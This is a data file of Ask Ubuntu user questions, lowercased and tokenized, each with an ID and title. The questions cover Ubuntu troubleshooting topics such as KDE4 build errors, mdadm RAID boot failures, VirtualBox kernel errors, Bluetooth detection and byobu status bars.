486008	how to get kde4 for building a project in ubuntu 12.04 ?	there is a command find_package ( kde4 required ) in the cmakelists.txt file from the question how to make a project of krusader . my attempts to build the project in the qt creator result in a message cmake error at /usr/share/cmake-2.8/modules/findkde4.cmake:98 ( message ) : error : cmake/modules/findkde4internal.cmake not found in /home/me_user/.kde/share/apps ; /usr/share/kde4/apps call stack ( most recent call first ) : cmakelists.txt:8 ( find_package ) what particular should i install into the ubuntu 12.04 to satisfy the line 'find_package ( kde4 required ) ' ? ( i asked about the same problem in qt build in ubuntu 12.04 ; i gave it up at that time , but it appears to be a basic matter . ) thanks !
486009	imac g5 new hard drive	please bear with me , as i 'm not the best with computers . i have a macbook air ( mid 2011 model ) currently running mavericks . i also recently got a free imac g5 ppc ( a1076 ) that came without an internal hard drive . i bought a new one before realizing i did n't have the disc for the operating system that is compatible with this particular model . after searching ebay , i came up short ( as all discs on there are > $ 100 ) . i was wondering if there is any way for me to get a compatible version of ubuntu onto the imac using an external hard drive ( 500gb ) ? any suggestions or solutions ? i can also , at some point , get a disc to burn the copy on , i just do n't have direct access to one right now . thanks !
486010	virtualbox - this kernel requires an x86-64 cpu , but only detects an i686 cpu , unable to boot	i 'm attempting to install ubuntu server on a virtualbox machine . every time i attempt to install i get the following : this kernel requires an x86-64 cpu , but only detects an i686 cpu , unable to boot i 'm running virtualbox on ubuntu server 14.04 ( 64 bit ) . i 've been able to successfully run arch linux ( 64 bit ) just fine on the same virtualbox install . these are the settings i have for vm : enable vt-x/amd-v is checked
486011	mdadm /dev/md0 fails to load on boot	i am running mythbuntu 14.04 with a raid 6 setup using 10 hds . every time i boot my system , mdadm fails to load . i have to run the following commands to get access to the system : all commands run through sudo . mdadm -- stop /dev/md0 mdadm -- assemble /dev/md0 mdadm -- add /dev/md0 /dev/sda mount /home anyone have any suggestions on how to get this to load automatically upon boot ? the output from mdadm -- detail /dev/md0 mdadm -- detail /dev/md0 /dev/md0 : version : 1.2 creation time : sun jun 15 11:17:13 2014 raid level : raid6 array size : 31254835200 ( 29806.93 gib 32004.95 gb ) used dev size : 3906854400 ( 3725.87 gib 4000.62 gb ) raid devices : 10 total devices : 10 persistence : superblock is persistent update time : fri jun 20 17:35:23 2014 state : active , degraded , recovering active devices : 9 working devices : 10 failed devices : 0 spare devices : 1 layout : left-symmetric chunk size : 512k rebuild status : 0 % complete name : muse:0 ( local to host muse ) uuid : aa3fa2ce:2ba2ec23:39c1bcce:282788bf events : 305197 number major minor raiddevice state 10 8 0 0 spare rebuilding /dev/sda 1 8 16 1 active sync /dev/sdb 2 8 32 2 active sync /dev/sdc 3 8 48 3 active sync /dev/sdd 4 8 64 4 active sync /dev/sde 5 8 80 5 active sync /dev/sdf 6 8 112 6 active sync /dev/sdh 7 8 128 7 active sync /dev/sdi 8 8 144 8 active sync /dev/sdj 9 8 160 9 active sync /dev/sdk the output from smartctl -l error /dev/sda smartctl -l error /dev/sda smartctl 6.2 2013-07-26 r3841 [ x86_64-linux-3.13.0-29-generic ] ( local build ) copyright ( c ) 2002-13 , bruce allen , christian franke , www.smartmontools.org === start of read smart data section === smart error log version : 1 no errors logged other notes : mdadm -- re-add /dev/md0 /dev/sda results in : mdadm : -- re-add for /dev/sda to /dev/md0 is not possible i have run update-initramfs -u my /etc/mdadm/mdadm.conf looks like : # mdadm.conf # # please refer to mdadm.conf ( 5 ) for information about this file . # # by default ( built-in ) , scan all partitions ( /proc/partitions ) and all # containers for md superblocks . alternatively , specify devices to scan , using # wildcards if desired . device partitions containers # auto-create devices with debian standard permissions create owner=root group=disk mode=0660 auto=yes # automatically tag new arrays as belonging to the local system homehost < system > # instruct the monitoring daemon where to send mail alerts mailaddr < spamfilter > # definitions of existing md arrays array /dev/md0 uuid=aa3fa2ce:2ba2ec23:39c1bcce:282788bf # this file was auto-generated on sat , 14 jun 2014 14:24:44 +0200 # by mkconf $ id $
486013	create a script to open firefox with some google search term from terminal	is there any way to create a script or a program that will open firefox , go onto google and search for the arguments passed to it ? so something like google how do i shoot web should open firefox with http : //www.google.com/search ? q=how+do+i+shoot+web i found this script google ( ) { search= '' '' echo `` googling : $ @ '' for term in $ @ ; do search= '' $ search % 20 $ term '' done xdg-open `` http : //www.google.com/search ? q= $ search '' } but i need to paste it into the terminal each time i want to use it ... so basically , what do i have to do to make the above script work without having to paste it into the terminal every time ?
486022	can i remove one ubuntu without touching the other ?	i have ubuntu 12.04 and 14.04 lts on the same notebook . i want to get rid of ubuntu 14.04 . can i do it without remove ubuntu 14.04 without removing ubuntu 12.04.4 ?
486024	qualcomm atheros qca8172 not network traffic is showed	i just buy a new lenovo ideapad s410p with this ethernet card : mario @ mario-ideapad-s410p : ~ $ lspci -nn | grep 0200 03:00.0 ethernet controller [ 0200 ] : qualcomm atheros qca8172 fast ethernet [ 1969:10a0 ] ( rev 10 ) both wireless and eth0 works fine , connect to internet and router no issues there . but with any tool i used for check the traffic on it show me zero in both up/down traffic . and this happen only with the eth0 interface , with the wireles card ( another qualcom atheros ) the traffic is showed , i search in google with no lucky , any idea about how to fix it ? p.d : using ubuntu 14.04 64 bits
486030	does ubuntu touch support desktop convert desktop convergence yet ?	i 've recently installed ubuntu touch on my nexus 7 ( 2nd gen ) . earlier i had bought a display adapter that worked with android , but with ubuntu touch installed it doesnt give an output . does ubuntu touch support docking yet ?
486038	using pkg-config to build openvpn	i want to build openvpn 2.3.4 on ubuntu 14.04 . therefore i downloaded and built the required libraries ( lzo , openssl ) . i installed them in /opt . how do i ./configure openvpn with pkg-config to use the right libraries and headers ? i did n't find a tutorial that explains the usage of pkg-config . any help is highly appreciated . thank you in advantage !
486041	crontab with espeak does n't work when sound card is busy with google hangouts	there may not be a solution to this , but here 's the problem nonetheless : ) i 'm on ubuntu 14.04 , using latest chrome as my browser my sound card is busy being used by google hangouts my crontab is set up like this : espeak `` hello '' > /path/to/my/error.log 2 > & 1 monitoring the error log , i see no errors . but i hear no sound either . when i quit the hangouts , i start hearing the espeak `` hello '' output from my speakers every minute . so , can espeak or any other program get around the fact that the sound card is busy ? thanks for reading the problem : )
486047	how to copy files to an external hdd from ubuntu live session ?	i have a 320 gigs hdd with no partition and ubuntu installed on it , but i ca n't see the display when it enters lock screen or the desktop . i tried running ubuntu through a live usb flash drive and it worked perfectly . i must 've done something at the terminal that the display goes off . anyways , now i 'm thinking to copy my data to an external hdd and re-install ubuntu . but when i try to copy any folder to external hdd it says `` the folder 'folder name ' can not be handled because you do not have permissions to read it '' .or when i open a folder it says `` you do n't have permissions necessary to view the contents of 'folder name ' '' . how can i get permissions to do so and copy the files to an external hdd , and re-install ubuntu . ( the file system of the internal hdd is ext4 if that matters ) help me please !
486048	how do i update a single ppa instead of all of them ?	for example , i have ppa : skunk/pepper-flash and only want to update it instead of the whole apt-get update . is there something like for example apt-get update ppa : skunk/pepper-flash that i can use ?
486049	amd64 14.04 lts fail to load ... amd64 13.04 ok ... i386 14.04 ok	amd64 14.04 lts fail to load is this the correct version for amd bulldozer , 4gb ram memory , m4 128gb ssd ? symptom : ubuntu logo progress bar dots keep cycling burned iso twice using k3b and md5sum tested ok amd64 13.04 was working for a year and i386 14.04 loaded ok system testing report this report was created using plainbox 0.5.3 on 2014-06-20t17:06:54 hardware information desktop management interface information sysfs-attributes processors processor 0 property value bogomips 6241 cache 2097152 count 8 model amd fx ( tm ) -8120 eight-core processor model_number 21 model_revision 2 model_version 1 other fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc nonstop_tsc extd_apicid aperfmperf pni pclmulqdq monitor ssse3 cx16 sse4_1 sse4_2 popcnt aes xsave avx lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs xop skinit wdt lwp fma4 nodeid_msr topoext perfctr_core perfctr_nb arat cpb hw_pstate npt lbrv svm_lock nrip_save tsc_scale vmcb_clean flushbyasid decodeassists pausefilter pfthreshold platform i386 speed 3100 type authenticamd processor 1 property value bogomips 6241 cache 2097152 count 8 model amd fx ( tm ) -8120 eight-core processor model_number 21 model_revision 2 model_version 1 other fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc nonstop_tsc extd_apicid aperfmperf pni pclmulqdq monitor ssse3 cx16 sse4_1 sse4_2 popcnt aes xsave avx lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs xop skinit wdt lwp fma4 nodeid_msr topoext perfctr_core perfctr_nb arat cpb hw_pstate npt lbrv svm_lock nrip_save tsc_scale vmcb_clean flushbyasid decodeassists pausefilter pfthreshold platform i386 speed 3100 type authenticamd processor 2 property value bogomips 6241 cache 2097152 count 8 model amd fx ( tm ) -8120 eight-core processor model_number 21 model_revision 2 model_version 1 other fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc nonstop_tsc extd_apicid aperfmperf pni pclmulqdq monitor ssse3 cx16 sse4_1 sse4_2 popcnt aes xsave avx lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs xop skinit wdt lwp fma4 nodeid_msr topoext perfctr_core perfctr_nb arat cpb hw_pstate npt lbrv svm_lock nrip_save tsc_scale vmcb_clean flushbyasid decodeassists pausefilter pfthreshold platform i386 speed 3100 type authenticamd processor 3 property value bogomips 6241 cache 2097152 count 8 model amd fx ( tm ) -8120 eight-core processor model_number 21 model_revision 2 model_version 1 other fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc nonstop_tsc extd_apicid aperfmperf pni pclmulqdq monitor ssse3 cx16 sse4_1 sse4_2 popcnt aes xsave avx lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs xop skinit wdt lwp fma4 nodeid_msr topoext perfctr_core perfctr_nb arat cpb hw_pstate npt lbrv svm_lock nrip_save tsc_scale vmcb_clean flushbyasid decodeassists pausefilter pfthreshold platform i386 speed 3100 type authenticamd processor 4 property value bogomips 6241 cache 2097152 count 8 model amd fx ( tm ) -8120 eight-core processor model_number 21 model_revision 2 model_version 1 other fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc nonstop_tsc extd_apicid aperfmperf pni pclmulqdq monitor ssse3 cx16 sse4_1 sse4_2 popcnt aes xsave avx lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs xop skinit wdt lwp fma4 nodeid_msr topoext perfctr_core perfctr_nb arat cpb hw_pstate npt lbrv svm_lock nrip_save tsc_scale vmcb_clean flushbyasid decodeassists pausefilter pfthreshold platform i386 speed 3100 type authenticamd processor 5 property value bogomips 6241 cache 2097152 count 8 model amd fx ( tm ) -8120 eight-core processor model_number 21 model_revision 2 model_version 1 other fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc nonstop_tsc extd_apicid aperfmperf pni pclmulqdq monitor ssse3 cx16 sse4_1 sse4_2 popcnt aes xsave avx lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs xop skinit wdt lwp fma4 nodeid_msr topoext perfctr_core perfctr_nb arat cpb hw_pstate npt lbrv svm_lock nrip_save tsc_scale vmcb_clean flushbyasid decodeassists pausefilter pfthreshold platform i386 speed 3100 type authenticamd processor 6 property value bogomips 6241 cache 2097152 count 8 model amd fx ( tm ) -8120 eight-core processor model_number 21 model_revision 2 model_version 1 other fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc nonstop_tsc extd_apicid aperfmperf pni pclmulqdq monitor ssse3 cx16 sse4_1 sse4_2 popcnt aes xsave avx lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs xop skinit wdt lwp fma4 nodeid_msr topoext perfctr_core perfctr_nb arat cpb hw_pstate npt lbrv svm_lock nrip_save tsc_scale vmcb_clean flushbyasid decodeassists pausefilter pfthreshold platform i386 speed 3100 type authenticamd processor 7 property value bogomips 6241 cache 2097152 count 8 model amd fx ( tm ) -8120 eight-core processor model_number 21 model_revision 2 model_version 1 other fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc nonstop_tsc extd_apicid aperfmperf pni pclmulqdq monitor ssse3 cx16 sse4_1 sse4_2 popcnt aes xsave avx lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs xop skinit wdt lwp fma4 nodeid_msr topoext perfctr_core perfctr_nb arat cpb hw_pstate npt lbrv svm_lock nrip_save tsc_scale vmcb_clean flushbyasid decodeassists pausefilter pfthreshold platform i386 speed 3100 type authenticamd software information packages installed installed version of ubuntu description ubuntu 14.04 lts distributor_id ubuntu release 14.04 codename trusty tests performed tests name result comment memory/info passed results : /proc/meminfo reports : 16574324.0 kb lshw reports : 16777216.0 kb pass : meminfo reports 207761408 bytes less than lshw , a difference of 1.21 % . this is less than the 10 % variance allowed . suspend/sd-storage-after-suspend skip job can not be started : required dependency '2013.com.canonical.certification : :suspend/sd-insert-after-suspend ' has failed camera/display skip job can not be started : resource expression `` device.category == 'capture ' '' evaluates to false , required dependency '2013.com.canonical.certification : :camera/detect ' has failed suspend/sdhc-insert-after-suspend skip n/a keys/media-control skip n/a audio/alsa_record_playback_usb skip n/a mediacard/mmc-remove skip job can not be started : required dependency '2013.com.canonical.certification : :mediacard/mmc-insert ' has failed wireless/wireless_connection skip job can not be started : resource expression `` device.category == 'wireless ' '' evaluates to false mediacard/cf-remove skip job can not be started : required dependency '2013.com.canonical.certification : :mediacard/cf-storage ' has failed suspend/resolution_before_suspend passed mediacard/mmc-storage skip job can not be started : required dependency '2013.com.canonical.certification : :mediacard/mmc-insert ' has failed input/mouse skip n/a miscellanea/submission-resources skip job can not be started : required dependency '2013.com.canonical.certification : :requirements ' has failed monitor/hdmi skip n/a mediacard/sd-storage skip job can not be started : required dependency '2013.com.canonical.certification : :mediacard/sd-insert ' has failed cpu/topology passed usb/insert skip n/a graphics/display passed n/a audio/playback_headphones skip n/a keys/volume skip n/a graphics/vesa_drivers_not_in_use passed monitor/vga skip n/a suspend/suspend_advanced passed calling sleep_test ==================== test results ==================== 1 : ( 'pass ' , 1.227433000000019 , 0.7924510000000282 ) average time to sleep : 1.2274 average time to resume : 0.7925 successfully completed 1 sleep iterations keys/sleep skip n/a cpu/offlining_test passed beginning cpu offlining test offlining cpu1 offlining cpu2 offlining cpu3 offlining cpu4 offlining cpu5 offlining cpu6 offlining cpu7 onlining cpu1 onlining cpu2 onlining cpu3 onlining cpu4 onlining cpu5 onlining cpu6 onlining cpu7 successfully turned 7 cores off and back on suspend/mmc-insert-after-suspend skip n/a miscellanea/is_laptop failed type : desktop battery : no keys/super skip n/a audio/alsa_record_playback_internal skip job can not be started : required dependency '2013.com.canonical.certification : :audio/playback_auto ' has failed mediacard/sd-remove skip job can not be started : required dependency '2013.com.canonical.certification : :mediacard/sd-insert ' has failed mediacard/cf-storage skip job can not be started : required dependency '2013.com.canonical.certification : :mediacard/cf-insert ' has failed usb/detect passed id 05dc : a720 lexar media , inc. id 1d6b:0002 linux foundation 2.0 root hub id 1d6b:0001 linux foundation 1.1 root hub id 1d6b:0003 linux foundation 3.0 root hub mediacard/sdhc-insert skip n/a usb/storage-automated skip job can not be started : required dependency '2013.com.canonical.certification : :usb/insert ' has failed usb/remove skip job can not be started : required dependency '2013.com.canonical.certification : :usb/insert ' has failed suspend/audio_before_suspend passed error : root : failed to save active profiles information : [ errno 13 ] permission denied : 'active_profiles' bluetooth/detect-output skip job can not be started : resource expression `` device.category == 'bluetooth ' '' evaluates to false input/keyboard skip n/a graphics/compiz_check passed suspend/memory_before_suspend passed disk/detect passed m4-ct128m4ssd2 gizmo ! gizmo ! optical/detect passed atapi ihas124 b keys/battery-info skip job can not be started : resource expression `` dmi.product in [ 'notebook ' , 'laptop ' , 'portable ' ] '' evaluates to false monitor/powersaving skip n/a keys/brightness skip job can not be started : resource expression `` dmi.product in [ 'notebook ' , 'laptop ' , 'portable ' ] '' evaluates to false suspend/bluetooth_detect_after_suspend skip job can not be started : resource expression `` device.category == 'bluetooth ' '' evaluates to false , required dependency '2013.com.canonical.certification : :bluetooth/detect-output ' has failed mediacard/mmc-insert skip n/a mediacard/cf-insert-after-suspend skip n/a suspend/resolution_after_suspend passed ethernet/detect passed -- -- -- -- -- -- -- -- -- -- -- -- -- - [ devices found by udev ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- category : network interface : eth0 product : motherboard vendor : realtek semiconductor co. , ltd. driver : r8169 ( ver : 2.3lk-napi ) path : /devices/pci0000:00/0000:00:15.0/0000:05:00.0 -- -- -- -- -- -- -- -- -- -- -- [ devices found by network manager ] -- -- -- -- -- -- -- -- -- -- -- category : ethernet interface : eth0 ip : 192.168.0.72 driver : r8169 ( ver : 2.3lk-napi ) state : activated suspend/audio_after_suspend passed error : root : failed to save active profiles information : [ errno 13 ] permission denied : 'active_profiles' suspend/sdhc-remove-after-suspend skip job can not be started : required dependency '2013.com.canonical.certification : :suspend/sdhc-insert-after-suspend ' has failed audio/list_devices passed 0 [ sb ] : hda-intel - hda ati sb hda ati sb at 0xfdff4000 irq 16 1 [ nvidia ] : hda-intel - hda nvidia hda nvidia at 0xfcffc000 irq 19 firewire/storage-test skip job can not be started : required dependency '2013.com.canonical.certification : :firewire/insert ' has failed graphics/driver_version passed -- -- -- -- -- -- - video driver information -- -- -- -- -- -- - video driver : nvidia driver version : 331.20 -- -- -- -- -- -- - hybrid graphics check -- -- -- -- -- -- -- -- graphics chipset : nvidia ( 10de:0de1 ) loaded ddx drivers : nouveau , modesetting , fbdev , vesa hybrid graphics : no suspend/network_after_suspend passed connected firewire/remove skip job can not be started : required dependency '2013.com.canonical.certification : :firewire/storage-test ' has failed audio/alsa_record_playback_external skip job can not be started : required dependency '2013.com.canonical.certification : :audio/playback_headphones ' has failed keys/wireless skip job can not be started : resource expression `` dmi.product in [ 'notebook ' , 'laptop ' , 'portable ' ] '' evaluates to false camera/detect skip job can not be started : resource expression `` device.category == 'capture ' '' evaluates to false keys/mute skip n/a mediacard/cf-remove-after-suspend skip job can not be started : required dependency '2013.com.canonical.certification : :mediacard/cf-insert-after-suspend ' has failed suspend/sdhc-storage-after-suspend skip job can not be started : required dependency '2013.com.canonical.certification : :suspend/sdhc-insert-after-suspend ' has failed suspend/network_before_suspend passed internet connection fully established mediacard/sdhc-storage skip job can not be started : required dependency '2013.com.canonical.certification : :mediacard/sdhc-insert ' has failed mediacard/cf-storage-after-suspend skip job can not be started : required dependency '2013.com.canonical.certification : :mediacard/cf-insert-after-suspend ' has failed suspend/wireless_before_suspend skip job can not be started : resource expression `` device.category == 'wireless ' '' evaluates to false , required dependency '2013.com.canonical.certification : :wireless/wireless_connection ' has failed graphics/minimum_resolution passed minimum acceptable display resolution : 800 x 600 detected display resolution : 1680 x 1050 suspend/sd-insert-after-suspend skip n/a firewire/insert skip n/a mediacard/sdhc-remove skip job can not be started : required dependency '2013.com.canonical.certification : :mediacard/sdhc-insert ' has failed suspend/sd-remove-after-suspend skip job can not be started : required dependency '2013.com.canonical.certification : :suspend/sd-insert-after-suspend ' has failed expresscard/verification skip n/a suspend/mmc-storage-after-suspend skip job can not be started : required dependency '2013.com.canonical.certification : :suspend/mmc-insert-after-suspend ' has failed power-management/rtc passed fri 20 jun 2014 10:03:41 am pdt -0.782514 seconds graphics/resolution passed n/a suspend/mmc-remove-after-suspend skip job can not be started : required dependency '2013.com.canonical.certification : :suspend/mmc-insert-after-suspend ' has failed cpu/clocktest passed testing for clock jitter on 8 cpus passed , largest jitter seen was 0.000785 clock direction test : start time 1403283615 , stop time 1403283675 , sleeptime 60 , delta 0 passed suspend/wireless_after_suspend skip job can not be started : resource expression `` device.category == 'wireless ' '' evaluates to false , required dependency '2013.com.canonical.certification : :suspend/wireless_before_suspend ' has failed mediacard/cf-insert skip n/a camera/still skip job can not be started : resource expression `` device.category == 'capture ' '' evaluates to false , required dependency '2013.com.canonical.certification : :camera/detect ' has failed audio/playback_auto skip n/a mediacard/sd-insert skip n/a suspend/memory_after_suspend passed log files and environment information lsmod_attachment modules_attachment efi_attachment sysctl_attachment modprobe_attachment codecs_attachment lspci_attachment cpuinfo_attachment dmesg_attachment dmidecode_attachment lshw_attachment
486050	upgrade to new version of ubuntu 14.10	i want to upgrade ubuntu 3.10 to 14 . but after running software updater it gives me only 13.10 ubuntu updates .
486052	what is this gtk-warning `` calling inhibit failed '' working with gedit ?	while working with gedit run from terminal , i got this warning message : ( gedit:21824 ) : gtk-warning ** : calling inhibit failed : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files
486055	installing lubuntu 14.04 in uefi	i have an asus n56vz . in the bios , uefi is enabled . i am trying to dual boot lubuntu 14.04 with preinstalled 64 bit windows 7 . i booted from a live-usb and there were two options , a normal usb boot option ( something like 'transcend ... ' ) and also an option with a uefi prefix ( 'uefi : transcend ... ' ) . which of these should i select ? does windows 7 require uefi boot ? or should i disable uefi in the bios ?
486056	recovering linux.swp file	i had ubuntu as host os and also had windows 7.in order to delete win 7 i formatted win 7 drive in ubuntu.but , till then i could not access ubuntu and found out that my linux.swp file had been deleted.can anyone suggest me how to recover that linux.swp file ?
486057	toshiba satellite p55-a : cant boot from usb	for a few days now i have been trying to install ubuntu ( also tried fedora , backtrack , and kali ) onto an 8gb usb drive . the install always seems to go off without a hitch . ive used unetbootin , univeral usb installer , lili , and live usb creator . the installs come out without any errors and instructs me to restart and select boot from usb . that never worked so the next step i took was to reinstall ( several times ) and tried altering my bios setting to rearrange my boot order , disable secure boot , and change to csm boot mode . i even tried turning off usb 3.0 to see if that could be a compatibility issue . if anyone has any insight into this issue i would be more than willing to offer all needed information . my laptop : toshiba satellite p55-a running windows 8.1 on 64 bit
486059	what is the keyboard shortcut for switching to subscript or superscript while using libre office	i just want to know how to switch to superscript or subscript while using libre office as many of my documents are chemistry and physics based which require a lot of subscript and superscript to write molecular formulae and physical formulae . coming to the point , can i get a keyboard short cut for superscript or subscript
486060	curious about unixbench results , is my hd configured properly ?	i downloaded unixbench 5.1.3 and ran it on both my old dell 4600 and my newer gateway sx2800 . with a 2.4ghz p4 the dell gets clobbered on cpu tests by the gateway with quad core q8200 at 2.3ghz . the surprising thing is that the old dell with a maxtor stm3200820a ( ata ) drive is much faster than the newer gateway with a wdc wd6400aaks-22a7b2 ( sata ) on file tests . for example : file copy 1024 bufsize 2000 maxblocks : 181258.6 ( dell , centos 6.5 ) 16985.0 ( gateway , ubuntu 12.04.4 lts )
486062	any cheap arm board that can run trusty	i was thinking of the mk802 but i didnt see anyone using trusty on it . i also thought of some others : beaglebone black ; status = i think it does pcduino v2 ; status = not sure cubox i1 ; status = no idea please help me find one that runs trusty thank you
486063	ubuntu 14.04 configure switchable graphics intel/amd	after upgrading to ubuntu 14.04 from 12.04 i lost the gui . after rebooting the loading screen appears ( that one with the logo and the dots that indicates the loading process ) . however , after that it appears the annoying black screen with the white underscore flashing . i 've been trying many tutorials to configure the switchable graphics in a previous versions of ubuntu , and at this moment , none of them works . my two graphic cards are : intel 3rd gen core graphic controller . amd/ati chelsea randeon hd 7730m moreover , as a consequence of my attempts to solve the problem , it has been generated a lot of xorg.config files ; such as ; xorg.config.05072014 ( note that is the date of each day ) or xorg.config.fglrx0 from 0 up to 15 . so i would like to know if i can safely remove some or all of them . so , i will appreciate any tip or advice for solving the graphical issue .
486066	wifi connect to ap but no internet connection	my ubuntu 14.04 can discover ap names in terminal nm-tool , can connect to ap but still have no internet connection . i discovered when booting from live usb ap and internet works just as it should be . so there can be solution . can anybody check which settings or command lines use linux kernel when booting from live usb and apply same settings when booting from hdd ? as far i know there is repeating issue from 10.04 lts ( and any 10.10 to 13.10 ) and up to latest 14.04 lts ! any help ? update : after booting from live usb , booted from hdd and wifi and internet works !
486069	pinch to zoom in unity with touchscreen	is there a way to enable pinch-to-zoom in unity ? it seems like mulititouch is supported with my touchscreen already : when i tip on a window with three fingers , i can move around the window . but when i try to zoom a website in firefox , only the text gets selected . is there a way to activate the functionality my lenovo yoga pro 2 has under windows 8 ?
486079	bluetooth connections are not displayed	i am trying to view my bluetooth connections , and i tried many commands , but none of the commands are displaying any kind of bluetooth connection . i am positive that my bluetooth is connected , because my keyboard and mouse are connected via bluetooth . how can i find information about my bluetooth connection ? i am running ubuntu 14.04 on a logitech keyboard and mouse . here are the commands that i have tried : [ lucas @ lucas-thinkpad-w520 ] /home/lucas $ hcitool scan device is not available : no such device [ lucas @ lucas-thinkpad-w520 ] /home/lucas $ hcitool dev devices : [ lucas @ lucas-thinkpad-w520 ] /home/lucas $ hcitool info info : too few arguments ( minimal : 1 ) usage : info < bdaddr > [ lucas @ lucas-thinkpad-w520 ] /home/lucas $ hcitool con connections : [ lucas @ lucas-thinkpad-w520 ] /home/lucas $ hcitool inq inquiring ... inquiry failed . : no such device [ lucas @ lucas-thinkpad-w520 ] /home/lucas $ hciconfig [ lucas @ lucas-thinkpad-w520 ] /home/lucas $ sudo service bluetooth status [ sudo ] password for lucas : bluetooth start/running , process 753 [ lucas @ lucas-thinkpad-w520 ] /home/lucas $
486081	how do i write an iptables rule to limit internet bandwidth usage of user or ip address	how do i control or limit internet bandwidth usage of users/computer/ip address in network with the help of iptables rules ? i have one static ip address which provides internet ( that is , wan ) . i assigned this to eth0 and the local network ip address as 192.168.0.1 ( lan ) which is eth1 . this machine is acting as my gateway and dhcp server . if it is possible , can i use the mac address to identify the machine ?
486082	hash value on directory	i want to verify integrity of folder . the folder has so many files and folders . how to calculate hash value of directory as a whole on ubuntu . md5sum calculate at only file level .
486083	pam module & nsswitch.conf	as i know , there are two authentication schema available on linux . pam auth modules and , /etc/nsswitch.conf file when user logs in , which one take the precedence . ?
486084	how do i control sound coming out of the integrated speakers ?	i 'm on an asus g750jw which comes with 2 speakers + sub woofer . the thing is ubuntu is throwing all the sound through the sub woofer . as you can imagine sound is not good at the moment . but maybe if i could control the volume of each speaker i would be able to fix it .
486086	archive manager error	i 'm trying to use game boy emulators on my laptop , but every time i try opening up the game boy emulator , this thing called archive manager keeps telling me `` an error occurred while trying to load the archive . '' what does this mean and how do i make it stop saying this ?
486090	restart an install process	i started installing phpmyadmin via ssh on an ubuntu server and got to a question i could n't answer and had to close . how do i resume the installation or stop it and start over ? the command sudo apt-get install phpmyadmin gives the error : could not get lock [ path ] - open unable to lock the administration directory the command ps aux | grep apt gives 4 processes including apt-get install phpmyadmin . btw , the question i had was whether i should use dbconfig-common when i have existing databases . the explanation was confusing .
486091	byobu statusbars of 2 different servers are still different after resetting byobu	i have two computers running 14.04 where i use byobu with tmux backend . the difference between both is that one uses an existing home directory that was backed up and transfered to a fresh installation while the other one is a completely new installation . the issue : both byobu statusbars look different it 's not only the yellow background that is different on the completely new installation on the lower bar in the image , but also the font weight and font color . if you look even closer , you find that ghz , g and seemingly % are n't bold on the lower bar . attempted troubleshooting read : how do i reset byobu 's settings ? tried deleting both ~/.byobu folders . tried configuring with byobu-config and byobu-select-profile . purged and reinstalled byobu on the machine that shows the upper statusbar . tried searching with find for tmux and byobu in /usr and /home/ $ user to find related files , but no luck . searched for differences in backups of both ~/.byobu folders . still no luck . restarted gnome-terminal and byobu instances several times . further details the upper statusbar is directly from my desktop , while the computer giving me the lower statusbar is connected via ssh . i assume that this does n't make any difference . as written above , the terminal client is gnome-terminal , background transparency is disabled and both gnome-terminal instances have the same color profile loaded . it feels like i 'm missing something obvious , but i 'm currently at my wits ' end . question : how to get a consistent statusbar ? or more precisely : how can i get a consistent default byobu statusbar displayed across machines ? further investigation in the mean time i found that , while i had reset the configuration , the custom byobu prompt was not enabled . i ran byobu-enable-prompt to enable it . ( this adds the line [ -r /home/ $ user/.byobu/prompt ] & & . /home/ $ user/.byobu/prompt # byobu-prompt # to ~/.bashrc ) i found that there exists /usr/bin/byobu-status-detail which gives a detailed overview about the configuration and compared portions of if like for the load average : # [ default ] # [ fg=black , bg=brightyellow ] 6.53 # [ default ] # [ fg=\ # eeeeee ] # [ bg=\ # 333333 ] ( load_average ) 6.53 5.93 5.87 8/1066 27196 # [ default ] # [ fg=black , bg=brightyellow ] 0.00 # [ default ] # [ fg=\ # eeeeee ] # [ bg=\ # 333333 ] ( load_average ) 0.00 0.01 0.05 2/444 3717 strangely , there is no difference there . dug a little bit further around in /usr/lib/byobu and /usr/share/byobu . a hint at the solution however , when i switched to the other machines desktop and connected to both byobu instances everything was as it should be ! this is interesting .
